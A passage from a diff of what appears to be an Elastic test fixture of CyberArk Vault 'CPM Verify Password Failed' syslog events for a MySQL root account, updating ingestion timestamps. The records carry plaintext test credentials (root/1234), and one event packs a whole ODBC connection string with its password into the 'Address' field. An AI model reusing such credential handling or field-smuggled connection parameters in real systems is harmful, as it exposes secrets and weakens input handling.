\u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615828174\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"DSN=mariadb;TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:10:25\",\"IsoTimestamp\":\"2021-03-15T17:10:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615828174\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"DSN\",\"Value\":\"DSN=mariadb;TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -1085,7 +1130,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-12-09T13:37:01.193648300Z", + "ingested": "2021-12-14T14:42:29.505127414Z", "original": "\u003c7\u003e1 2021-03-15T17:28:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:28:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:28:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=127.0.0.1;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"127.0.0.1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615829287\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:28:07\",\"IsoTimestamp\":\"2021-03-15T17:28:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=127.0.0.1;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"127.0.0.1\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615829287\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -1198,7 +1243,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-12-09T13:37:01.193654Z", + "ingested": "2021-12-14T14:42:29.505127795Z", "original": "\u003c7\u003e1 2021-03-15T17:33:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:33:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:33:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=127.0.0.1;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"127.0.0.1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615829597\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"mysql\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:33:17\",\"IsoTimestamp\":\"2021-03-15T17:33:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=127.0.0.1;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"127.0.0.1\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615829597\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"DSN\",\"Value\":\"mysql\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -1311,7 +1356,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length", - "ingested": "2021-12-09T13:37:01.193660Z", + "ingested": "2021-12-14T14:42:29.505128312Z", "original": "\u003c7\u003e1 2021-03-15T17:38:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:38:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:38:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=127.0.0.1;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"127.0.0.1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615829907\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:38:27\",\"IsoTimestamp\":\"2021-03-15T17:38:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\",\"ExtraDetails\":\"address=127.0.0.1;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"127.0.0.1\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615829907\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"DSN\",\"Value\":\"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -1420,7 +1465,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-12-09T13:37:01.193665900Z", + "ingested": "2021-12-14T14:42:29.505128689Z", "original": "\u003c7\u003e1 2021-03-15T18:00:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 11:00:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T18:00:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=Driver\\\\={MySQL ODBC 5.3 Unicode Driver}\\\\;server\\\\=127.0.0.1\\\\;user\\\\=root\\\\;option\\\\=3\\\\;port\\\\=3306\\\\;Password\\\\=1234;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615831206\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"mysql\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 11:00:07\",\"IsoTimestamp\":\"2021-03-15T18:00:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=Driver\\\\={MySQL ODBC 5.3 Unicode Driver}\\\\;server\\\\=127.0.0.1\\\\;user\\\\=root\\\\;option\\\\=3\\\\;port\\\\=3306\\\\;Password\\\\=1234;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"Driver={MySQL ODBC 5.3 Unicode 